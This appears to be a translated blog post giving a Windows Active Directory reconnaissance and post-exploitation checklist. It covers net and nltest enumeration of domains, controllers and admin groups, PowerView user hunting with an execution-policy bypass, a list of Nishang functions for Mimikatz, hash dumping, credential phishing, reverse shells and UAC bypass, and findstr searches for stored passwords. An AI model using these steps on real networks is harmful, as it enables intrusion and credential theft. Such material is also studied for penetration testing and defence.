2024-07-12
한어Русский языкEnglishFrançaisIndonesianSanskrit日本語DeutschPortuguêsΕλληνικάespañolItalianoSuomalainenLatina
Four situations:
1. Local user: user
2. Local administrator user: disabled in home edition, only available in server edition
3.Domain users
4.Domain Administrator
Local users cannot obtain domain information.
Local administrator users can directly elevate their privileges to system users (domain users) and obtain domain information.
1. Determine whether the domain exists:
1. Check the domain: ipconfig/all or systeminfo or net configure workstation
ipconfig /all: Found the domain: hack.com
systeminfo: Found the domain: hack.com
2. Check the DNS host of the domain: nslookup domain name (hack.com)
3.Net time /domain three situations
The domain exists, but the current user is not a domain user
A domain exists and the current user is a domain user
The current network environment is a workgroup, and there is no domain.
1.net view: Display domain list, computer list, and specify computer shared resources: net view (display computer list) net view \computer (view specified shared computer)
net view /domain:domain name (hack) (display computer list)
2.net user to view local users: net user /domain to view the number of users in the domain
Add user: net user name (admin) password (123) /add
3.net use: connects or disconnects a computer from a shared resource, and displays the computer's connection information
4.net time: Use time to synchronize computers or domains: net time \computer net time /domain
5.net start: Start the service, or display the services that have been started: net start service
6.net pause: Pause the running service: net pause service
7.net continue: Reactivate service: net continue service
8.net stop: Stop Windows NT/2000/2003 service: net stop service
9.net share: delete, create, or display shared resources
10.net session: List or disconnect the sessions between the local computer and the clients connected to it:
net session //computer (identifies the computer to be listed or the session)
net session //computer delete (disconnect the session of the specified computer)
11.net localgroup View computer groups (only applicable to local): net localgroup username
Domain user: net localgroup username/domain
12.net group queries the name of the group in the domain (only applicable to domain controllers): net group /domain
13.net config displays currently running configurable services, or displays and changes the configuration of a service (locally):
net config (displays a list of running services) net config services (displays a list of services)
14.net computer Add or delete computers from the domain database:
net computer \computername /add or /del (add or delete a computer to a logon domain)
If the message "The server list for this workgroup is currently unavailable" appears, open services: Server, WorkStation, computer Browser, and turn off the firewall.
Check domain: ipconfig/all or systeminfo or net config workstation
Check the DNS host of the domain: nslookup domain name (hack.com)
Query domain: net view /domain
Query all computers in the domain: net view /domain:domain name
Query the list of all user groups in the domain: net group /domain
Query the computer list of all domain members: net group "domain computers" /domain
Query domain password information: net accounts /domain
Get domain trust information: nltest /domain_trusts
Check the domain controller name: nltest /DCLIST:hack
Check the machine name, find the IP, ping/nslookup: ping/nslookup domain controller name
Sometimes ping is disabled, here use nslookup
Check the domain controller host name: nslookup ‐type=SRV _ldap._tcp
Check the current time: net time /domain
View the domain controller group: net group "Domain Controllers" /domain
1. Query user information in the domain: net user /domain
2. View local users: wmic useraccount get name Domain users: wmic useraccount get domain,name
Local users:
Domain User:
3. Check existing users: dsquery user (may not work sometimes, can only be run on the server machine)
4. Query the local administrator user group: net localgroup administrators
5. Query domain administrator users: net group "domain admins" /domain
6. Query the domain administrator user group: net group "Enterprise Admins" /domain
Two tools are needed here
Upload the tool to the server first, then execute
1. PVEFindADUser: PVEFindADUser.exe -current (note the path) This tool can view which users have logged into the computer, so that we can find the domain administrator.
2.powerView script:
powershell.exe ‐exec bypass ‐command "& { import‐module .PowerView.ps1;Invoke‐UserHunter}"
First check the permissions: Get-ExecutionPolicy
Change the operation policy: Set-ExecutionPolicy Unrestricted (only Unrestricted permissions can execute pow)
Nishang tool (download link in the previous article):
After placing it in the CS directory, import it directly: powershell-import nishang/nishang.psm1
Execute: PowerShell command
Some commonly used commands:
Check-VM: Check whether the host is a virtual machine
Invoke-CredentialsPhish: Trick the user into entering a password
Get-WLAN-Keys: Wi-Fi information
Invoke-Mimikatz: Grabbing Passwords
Get-PassHashes: Get the hash
Get-PassHints: Get the user's password hint information
Invoke-PowerShellTcp: Reverse shell
Invoke-PsUACme: Bypass UAC
Remove-Update: Remove patches
Get-Information: Local machine information
Example: PowerShell Check-VM
1. Collect various sensitive files in the specified directory
dir /a /s /b d:"*.txt"
dir /a /s /b C:"*.xlsx"
dir /a /s /b d:"*.md"
dir /a /s /b d:"*.sql"
dir /a /s /b d:"*.pdf"
dir /a /s /b d:"*.docx"
dir /a /s /b d:"*.doc"
dir /a /s /b d:"*conf*"
dir /a /s /b d:"*bak*"
dir /a /s /b d:"*pwd*"
dir /a /s /b d:"*pass*"
dir /a /s /b d:"*login*"
dir /a /s /b d:"*user*"
2. Collect various account passwords from files in the specified directory
findstr /si pass *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si userpwd *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si pwd *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si login *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si user *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
Example: dir /a /s /bd:"*.txt"
I have devoted myself to the research of technology for more than 30 years. I am proficient in various languages such as Java, Linux, JavaScript, PHP, CSS, etc. I have made many contributions in the field of open source. I have established a developer documentation site to share some problems in technology development for everyone to read.
